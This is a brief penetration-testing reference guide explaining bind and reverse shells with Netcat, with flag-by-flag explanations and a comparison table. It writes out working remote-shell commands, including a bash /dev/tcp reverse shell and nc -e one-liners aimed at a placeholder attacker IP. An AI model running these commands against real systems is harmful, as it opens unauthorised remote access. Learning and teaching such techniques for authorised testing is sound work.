Bind and Reverse Shell Reference Guide

Outlines shell types, connection handling, and post-exploitation access techniques. Shows strong understanding of remote access control.

# Bind and Reverse Shell Listener Setup

How to set up both **bind shells** and **reverse shells** using Netcat. These techniques are common in penetration testing for establishing remote command execution after a foothold is obtained.

---

## 1. Bind Shell

A bind shell is created on the **target system**.  
The target opens a listening port and waits for the attacker to connect.

### 1.1 Create a Bind Shell on the Target

```bash
nc -lvp 9001 -e /bin/bash
````

**Explanation:**

* `-l` starts Netcat in listen mode
* `-v` enables verbose output
* `-p 9001` binds to port 9001
* `-e /bin/bash` executes bash when a connection is made

This command turns the target machine into a listener that provides a shell when someone connects to the port.

### 1.2 Connect to the Bind Shell from the Attacker

```bash
nc <target-ip> 9001
```

After connecting, you receive remote command execution on the target through the bash process.

---

## 2. Reverse Shell

A reverse shell is created on the **attacker system**.
The attacker sets up a listener, and the target initiates the outbound connection.

Reverse shells are often more reliable because outbound connections are allowed in most environments.

### 2.1 Set Up the Listener on the Attacker

```bash
nc -lvnp 9001
```

**Explanation:**

* `-l` listen mode
* `-v` verbose
* `-n` avoid DNS lookups
* `-p 9001` listen on port 9001

### 2.2 Launch the Reverse Shell from the Target

Using bash:

```bash
bash -i >& /dev/tcp/<attacker-ip>/9001 0>&1
```

Using Netcat (if supported):

```bash
nc <attacker-ip> 9001 -e /bin/bash
```

After running the reverse connection, the attacker receives interactive shell access.

---

## 3. Summary of Use Cases

| Technique     | Listener Location | Connection Direction     | Typical Use                       |
| ------------- | ----------------- | ------------------------ | --------------------------------- |
| Bind Shell    | Victim            | Attacker connects inward | When inbound ports are accessible |
| Reverse Shell | Attacker          | Victim connects outward  | Works through firewalls and NAT   |

Reverse shells are the standard choice in most real engagements because outbound traffic is rarely blocked.

---